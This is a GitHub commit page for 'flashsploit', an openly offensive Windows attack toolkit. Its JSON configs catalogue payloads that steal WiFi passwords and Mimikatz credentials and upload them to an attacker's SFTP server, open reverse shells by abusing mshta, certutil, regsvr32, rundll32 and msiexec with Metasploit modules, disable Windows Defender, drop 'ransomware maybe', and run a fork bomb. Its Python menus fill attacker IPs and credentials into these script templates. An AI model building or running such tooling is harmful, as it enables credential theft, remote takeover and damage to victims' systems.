Skip to content

Commit b5cfcc8

Browse files
committed
Uploaded files
1 parent 62b1687 commit b5cfcc8

23 files changed

+899
-0
lines changed

conf/exfil_scripts.json

Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
{
2+
"wifi_key_grabber": {
3+
"desc": "Extracts All WiFi Passwords and Uploads xml to your SFTP Server",
4+
"sftp": 1,
5+
"msf": 0
6+
},
7+
"netinfo": {
8+
"desc": "Extracts Network Configuration Information of Target System and Uploads to your SFTP Server",
9+
"sftp": 1,
10+
"msf": 0
11+
},
12+
"mimikatz": {
13+
"desc": "Extracts Passwords and Other Critical Information using Mimikatz and Uploads to your SFTP Server",
14+
"sftp": 1,
15+
"msf": 0
16+
}
17+
}

conf/misc_scripts.json

Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
{
2+
"change_wallpaper": {
3+
"desc": "Changes Wallpaper of Target Machine",
4+
"url": 1,
5+
"server": 0
6+
},
7+
"fork_bomb": {
8+
"desc": "Make Windows Unresponsive using a .bat Script ( 100% CPU and RAM Usage )",
9+
"url": 0,
10+
"server": 0
11+
},
12+
"dropper": {
13+
"desc": "Drop and Execute a File of your Choice, ransomware maybe... ;)",
14+
"url": 0,
15+
"server": 1
16+
},
17+
"anti_defender": {
18+
"desc": "Disables Windows Defender Service on Target Machine",
19+
"url": 0,
20+
"server": 0
21+
}
22+
}

conf/rshell_scripts.json

Lines changed: 50 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,50 @@
1+
{
2+
"hta": {
3+
"desc": "Get Reverse Shell by Abusing Microsoft HTML Apps (mshta)",
4+
"sftp": 0,
5+
"msf": 1,
6+
"module": "exploit/windows/misc/hta_server",
7+
"srv": 1,
8+
"target": "0"
9+
},
10+
"certutil": {
11+
"desc": "Get Reverse Shell by Abusing Certification Authority Utility (certutil)",
12+
"sftp": 0,
13+
"module": "exploit/multi/handler",
14+
"msf": 1,
15+
"srv": 0,
16+
"target": "0"
17+
},
18+
"cscript": {
19+
"desc": "Get Reverse Shell by Abusing Windows Script Host (csript)",
20+
"sftp": 0,
21+
"module": "exploit/multi/handler",
22+
"msf": 1,
23+
"srv": 0,
24+
"target": "0"
25+
},
26+
"msiexec": {
27+
"desc": "Get Reverse Shell by Abusing Windows Installer (msiexec)",
28+
"sftp": 0,
29+
"module": "exploit/multi/handler",
30+
"msf": 1,
31+
"srv": 0,
32+
"target": "0"
33+
},
34+
"regsvr": {
35+
"desc": "Get Reverse Shell by Abusing Microsoft Register Server Utility (regsvr32)",
36+
"sftp": 0,
37+
"module": "exploit/multi/script/web_delivery",
38+
"msf": 1,
39+
"srv": 1,
40+
"target": "3"
41+
},
42+
"rundll": {
43+
"desc": "Get Reverse Shell by Abusing Rundll32",
44+
"sftp": 0,
45+
"module": "exploit/windows/smb/smb_delivery",
46+
"msf": 1,
47+
"srv": 1,
48+
"target": "0"
49+
}
50+
}

conf/sftp.conf

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1 @@
1+
username:password

flashsploit.py

Lines changed: 83 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,83 @@
1+
#!/usr/bin/env python3
2+
3+
import os
4+
import subprocess as subp
5+
from modules.misc import misc
6+
from modules.exfil import exfil
7+
from modules.reverse_shell import rshell
8+
9+
R = '\033[31m' # red
10+
G = '\033[32m' # green
11+
C = '\033[36m' # cyan
12+
W = '\033[0m' # white
13+
14+
version = '1.0.0'
15+
16+
def banner():
17+
os.system('clear')
18+
banner = r'''
19+
______ __ __ _ __
20+
/ __/ /___ ______/ /_ _________ / /___ (_) /_
21+
/ /_/ / __ `/ ___/ __ \/ ___/ __ \/ / __ \/ / __/
22+
/ __/ / /_/ (__ ) / / (__ ) /_/ / / /_/ / / /_
23+
/_/ /_/\__,_/____/_/ /_/____/ .___/_/\____/_/\__/
24+
/_/
25+
'''
26+
print(G + banner + W)
27+
print(G + '[+]' + C + ' Created By : ' + W + 'thewhiteh4t')
28+
print(G + '[+]' + C + ' Version : ' + W + version)
29+
30+
def main():
31+
print('\n' + G + '[+]' + C + ' Choose Target : ' + W + '\n')
32+
print(G + '[1]' + C + ' Windows' + W)
33+
while True:
34+
choice = input(G + '\nfs > ' + W)
35+
36+
if choice == '1':
37+
win()
38+
elif choice == 'exit' or choice == 'quit':
39+
subp.call(['systemctl', 'stop', 'ssh.service'])
40+
subp.call(['pkill', 'php'])
41+
exit()
42+
else:
43+
print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
44+
pass
45+
46+
def win():
47+
print('\n', end='')
48+
print(G + '[1]' + C + ' exfil' + W)
49+
print(G + '[2]' + C + ' reverse_shell' + W)
50+
print(G + '[3]' + C + ' misc' + W)
51+
52+
while True:
53+
win_choice = input(G + '\nfs[windows] > ' + W)
54+
55+
if win_choice == '1':
56+
exfil(win)
57+
elif win_choice == '2':
58+
rshell(win)
59+
elif win_choice == '3':
60+
misc(win)
61+
elif win_choice == 'clear':
62+
os.system('clear')
63+
elif win_choice == 'back':
64+
return main()
65+
elif win_choice == 'help':
66+
return win()
67+
elif win_choice == '':
68+
pass
69+
elif win_choice == 'exit' or win_choice == 'quit':
70+
subp.call(['systemctl', 'stop', 'ssh.service'])
71+
subp.call(['pkill', 'php'])
72+
exit()
73+
else:
74+
print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
75+
pass
76+
77+
try:
78+
banner()
79+
main()
80+
except KeyboardInterrupt:
81+
print(R + '[-]' + C + ' Keyboard Interrupt.' + W)
82+
subp.call(['systemctl', 'stop', 'ssh.service'])
83+
subp.call(['pkill', 'php'])

modules/__init__.py

Whitespace-only changes.

modules/exfil.py

Lines changed: 80 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,80 @@
1+
#!/usr/bin/env python3
2+
3+
import os
4+
import json
5+
from modules.sftp import sftp
6+
7+
R = '\033[31m' # red
8+
G = '\033[32m' # green
9+
C = '\033[36m' # cyan
10+
W = '\033[0m' # white
11+
12+
def exfil(win):
13+
print('\n', end='')
14+
exfil_scripts = []
15+
for (dirpath, dirname, filenames) in os.walk('scripts/windows/exfil'):
16+
exfil_scripts.extend(filenames)
17+
for item in exfil_scripts:
18+
print(G + '[{}] '.format(exfil_scripts.index(item)) + C + item)
19+
20+
while True:
21+
exfil_choice = input(G + '\nfs[windows/exfil] > ' + W)
22+
23+
if exfil_choice == 'clear':
24+
os.system('clear')
25+
elif exfil_choice == 'back':
26+
return win()
27+
elif exfil_choice == 'help':
28+
return exfil(win)
29+
elif exfil_choice == '':
30+
pass
31+
elif exfil_choice == 'exit' or exfil_choice == 'quit':
32+
subp.call(['systemctl', 'stop', 'ssh.service'])
33+
subp.call(['pkill', 'php'])
34+
exit()
35+
elif int(exfil_choice) <= len(exfil_scripts) - 1:
36+
with open('conf/exfil_scripts.json', 'r') as json_file:
37+
options = json.load(json_file)
38+
try:
39+
chosen = exfil_scripts[int(exfil_choice)]
40+
41+
for k,v in options.items():
42+
if k in chosen:
43+
sftp_state = v['sftp']
44+
msf_state = v['msf']
45+
desc = v['desc']
46+
print('\n', end = '')
47+
print(G + '[+]' + C + ' Script : ' + W + chosen + '\n')
48+
print(G + '[+]' + C + ' Info : ' + W + desc + '\n')
49+
if sftp_state == 1:
50+
sftp()
51+
else:
52+
pass
53+
if msf_state == 1:
54+
msf()
55+
else:
56+
pass
57+
script_path = '/scripts/windows/exfil/' + chosen
58+
exfil_output(script_path, chosen)
59+
except ValueError:
60+
pass
61+
else:
62+
print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
63+
pass
64+
65+
def exfil_output(script_path, chosen):
66+
base_path = os.getcwd() + script_path
67+
68+
with open(base_path, 'r') as file :
69+
filedata = file.read()
70+
71+
filedata = filedata.replace('USERNAME', sftp.sftp_user)
72+
filedata = filedata.replace('PASSWORD', sftp.sftp_pass)
73+
filedata = filedata.replace('IPADDR', sftp.server_ip)
74+
75+
with open('output/{}'.format(chosen), 'w') as file:
76+
file.write(filedata)
77+
78+
outfile_path = os.getcwd() + '/output/{}'.format(chosen)
79+
80+
print(G + '[+]' + C + ' Script Generated : ' + W + outfile_path)

modules/misc.py

Lines changed: 91 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,91 @@
1+
#!/usr/bin/env python3
2+
3+
import os
4+
import json
5+
6+
R = '\033[31m' # red
7+
G = '\033[32m' # green
8+
C = '\033[36m' # cyan
9+
W = '\033[0m' # white
10+
11+
def misc(win):
12+
print('\n', end='')
13+
misc_scripts = []
14+
for (dirpath, dirname, filenames) in os.walk('scripts/windows/misc'):
15+
misc_scripts.extend(filenames)
16+
for item in misc_scripts:
17+
print(G + '[{}] '.format(misc_scripts.index(item)) + W + item)
18+
19+
while True:
20+
try:
21+
misc_choice = input(G + '\nfs[windows/misc] > ' + W)
22+
23+
if misc_choice == 'clear':
24+
os.system('clear')
25+
elif misc_choice == 'back':
26+
return win()
27+
elif misc_choice == 'help':
28+
return misc(win)
29+
elif misc_choice == '':
30+
pass
31+
elif misc_choice == 'exit' or misc_choice == 'quit':
32+
subp.call(['systemctl', 'stop', 'ssh.service'])
33+
subp.call(['pkill', 'php'])
34+
exit()
35+
elif int(misc_choice) <= len(misc_scripts) - 1:
36+
with open('conf/misc_scripts.json', 'r') as json_file:
37+
options = json.load(json_file)
38+
chosen = misc_scripts[int(misc_choice)]
39+
40+
for k,v in options.items():
41+
if k in chosen:
42+
desc = v['desc']
43+
url_state = v['url']
44+
server_state = v['server']
45+
print('\n', end = '')
46+
print(G + '[+]' + C + ' Script : ' + W + chosen + '\n')
47+
print(G + '[+]' + C + ' Info : ' + W + desc + '\n')
48+
if url_state == 1:
49+
misc.misc_url = input(G + '[+]' + C + ' URL : ' + W)
50+
else:
51+
pass
52+
if server_state == 1:
53+
misc.misc_host = input(G + '[+]' + C + ' Server Host : ' + W)
54+
misc.misc_port = input(G + '[+]' + C + ' Server Port : ' + W)
55+
misc.misc_fname = input(G + '[+]' + C + ' Filename (with extension) : ' + W)
56+
script_path = '/scripts/windows/misc/' + chosen
57+
misc_output(script_path, chosen, url_state, server_state)
58+
else:
59+
print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
60+
pass
61+
except ValueError:
62+
print('\n' + R + '[-]' + C + ' Invalid Input...' + W)
63+
pass
64+
65+
def misc_output(script_path, chosen, url_state, server_state):
66+
base_path = os.getcwd() + script_path
67+
outfile_path = os.getcwd() + '/output/{}'.format(chosen)
68+
69+
if url_state == 1:
70+
with open(base_path, 'r') as file :
71+
filedata = file.read()
72+
73+
filedata = filedata.replace('URL', misc.misc_url)
74+
75+
with open('output/{}'.format(chosen), 'w') as file:
76+
file.write(filedata)
77+
else:
78+
os.system('cp {} {}'.format(base_path, outfile_path))
79+
80+
if server_state == 1:
81+
with open(base_path, 'r') as file :
82+
filedata = file.read()
83+
84+
filedata = filedata.replace('HOST', misc.misc_host)
85+
filedata = filedata.replace('PORT', misc.misc_port)
86+
filedata = filedata.replace('FILENAME', misc.misc_fname)
87+
88+
with open('output/{}'.format(chosen), 'w') as file:
89+
file.write(filedata)
90+
91+
print(G + '[+]' + C + ' Script Generated : ' + W + outfile_path)

0 commit comments

Comments
 (0)